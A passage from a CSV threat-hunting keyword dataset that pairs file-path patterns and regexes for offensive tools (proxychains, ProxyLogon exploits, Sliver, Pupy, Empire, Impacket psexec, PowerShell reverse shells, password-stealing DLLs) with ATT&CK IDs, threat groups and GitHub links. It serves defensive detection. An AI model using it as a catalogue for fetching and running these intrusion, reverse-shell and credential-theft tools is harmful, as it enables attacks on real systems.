listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.","T1210 - T1561 - T1336 - T1335","TA0002 - TA0011 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/Proxmark/proxmark3","1","1","N/A","network exploitation tool","N/A","10","3288","923","2024-02-03T13:32:36Z","2014-03-16T23:36:31Z","9933" "*/proxy/Tor.py*",".{0,1000}\/proxy\/Tor\.py.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","9934" "*/proxy/tor_paths.py*",".{0,1000}\/proxy\/tor_paths\.py.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","9935" "*/Proxy_Def_File_Generator.cna*",".{0,1000}\/Proxy_Def_File_Generator\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","N/A","10","10","147","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z","9936" "*/proxychains-*.zip*",".{0,1000}\/proxychains\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","9937" "*/proxychains.conf*",".{0,1000}\/proxychains\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - 
EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#linux","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","9938" "*/proxychains.git*",".{0,1000}\/proxychains\.git.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","9939" "*/proxychains-ng*",".{0,1000}\/proxychains\-ng.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","9940" "*/ProxyLogon.git*",".{0,1000}\/ProxyLogon\.git.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","1","N/A","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","9941" "*/proxylogon.git*",".{0,1000}\/proxylogon\.git.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation 
tool","https://github.com/hakivvi/proxylogon","1","1","N/A","N/A","10","1","20","6","2022-04-23T03:21:44Z","2021-03-14T13:04:07Z","9942" "*/proxylogon.py*",".{0,1000}\/proxylogon\.py.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","1","N/A","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","9943" "*/proxymaybeshell*",".{0,1000}\/proxymaybeshell.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9944" "*/proxyTunnel.ps1*",".{0,1000}\/proxyTunnel\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","9945" "*/ps_windows.go*",".{0,1000}\/ps_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","9946" "*/ps1_oneliner.py*",".{0,1000}\/ps1_oneliner\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 
- T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9947" "*/PS1ToBase64.ps1*",".{0,1000}\/PS1ToBase64\.ps1.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","9948" "*/PS2EXE.git*",".{0,1000}\/PS2EXE\.git.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","9949" "*/ps2exe.ps1*",".{0,1000}\/ps2exe\.ps1.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","1","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","9950" "*/PS2EXE.ps1*",".{0,1000}\/PS2EXE\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","1","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","9951" "*/ps2exe.ps1*",".{0,1000}\/ps2exe\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","9953" "*/PS2EXE/*",".{0,1000}\/PS2EXE\/.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - 
TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","9954" "*/PSAmsi.git*",".{0,1000}\/PSAmsi\.git.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","9955" "*/PSAsyncShell.git*",".{0,1000}\/PSAsyncShell\.git.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","1","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","9956" "*/PSAsyncShell.ps1*",".{0,1000}\/PSAsyncShell\.ps1.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","1","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","9957" "*/PSAsyncShell.sh*",".{0,1000}\/PSAsyncShell\.sh.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","1","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","9958" "*/PSAsyncShell-main*",".{0,1000}\/PSAsyncShell\-main.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","9959" 
"*/PSAttack.git*",".{0,1000}\/PSAttack\.git.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","9960" "*/PSAttack.zip*",".{0,1000}\/PSAttack\.zip.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","9961" "*/PSAttack/releases/download/*",".{0,1000}\/PSAttack\/releases\/download\/.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","9962" "*/ps-empire*",".{0,1000}\/ps\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - 
T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","9963" "*/psexec.json*",".{0,1000}\/psexec\.json.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9964" "*/psexec.py*",".{0,1000}\/psexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9965" "*/psexecsvc.py*",".{0,1000}\/psexecsvc\.py.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral 
Movement","https://github.com/sensepost/susinternals","1","1","N/A","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","9966" "*/psgetsys.ps1*",".{0,1000}\/psgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","9967" "*/psgetsys.ps1*",".{0,1000}\/psgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","9968" "*/psgetsystem.git*",".{0,1000}\/psgetsystem\.git.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","9969" "*/PSInject.ps1*",".{0,1000}\/PSInject\.ps1.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","9970" "*/PSLessExec.exe*",".{0,1000}\/PSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - 
T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","9971" "*/PsMapExec.git*",".{0,1000}\/PsMapExec\.git.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","9974" "*/PsMapExec/*",".{0,1000}\/PsMapExec\/.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","9975" "*/PSnmap.git*",".{0,1000}\/PSnmap\.git.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","1","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","9976" "*/PSnmap.ps1*",".{0,1000}\/PSnmap\.ps1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","9977" "*/PSnmap.psd1*",".{0,1000}\/PSnmap\.psd1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","1","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","9978" "*/PSnmap.psm1*",".{0,1000}\/PSnmap\.psm1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","1","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","9979" "*/psnuffle*",".{0,1000}\/psnuffle.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9980" "*/psobf.git*",".{0,1000}\/psobf\.git.{0,1000}","offensive_tool_keyword","psobf","PowerShell Obfuscator","T1027 - T1059 - T1564","TA0005","N/A","N/A","Defense Evasion","https://github.com/TaurusOmar/psobf","1","1","N/A","N/A","6","2","171","30","2024-06-07T02:50:43Z","2024-06-07T01:45:12Z","9981" "*/PSObfucate.py*",".{0,1000}\/PSObfucate\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","9982" "*/PSpersist.git*",".{0,1000}\/PSpersist\.git.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and 
whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","9983" "*/pspy -*",".{0,1000}\/pspy\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9984" "*/PSPY.dll*",".{0,1000}\/PSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9985" "*/pspy.git*",".{0,1000}\/pspy\.git.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","6","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9986" "*/pspy.git*",".{0,1000}\/pspy\.git.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","9987" "*/pspy.go*",".{0,1000}\/pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - 
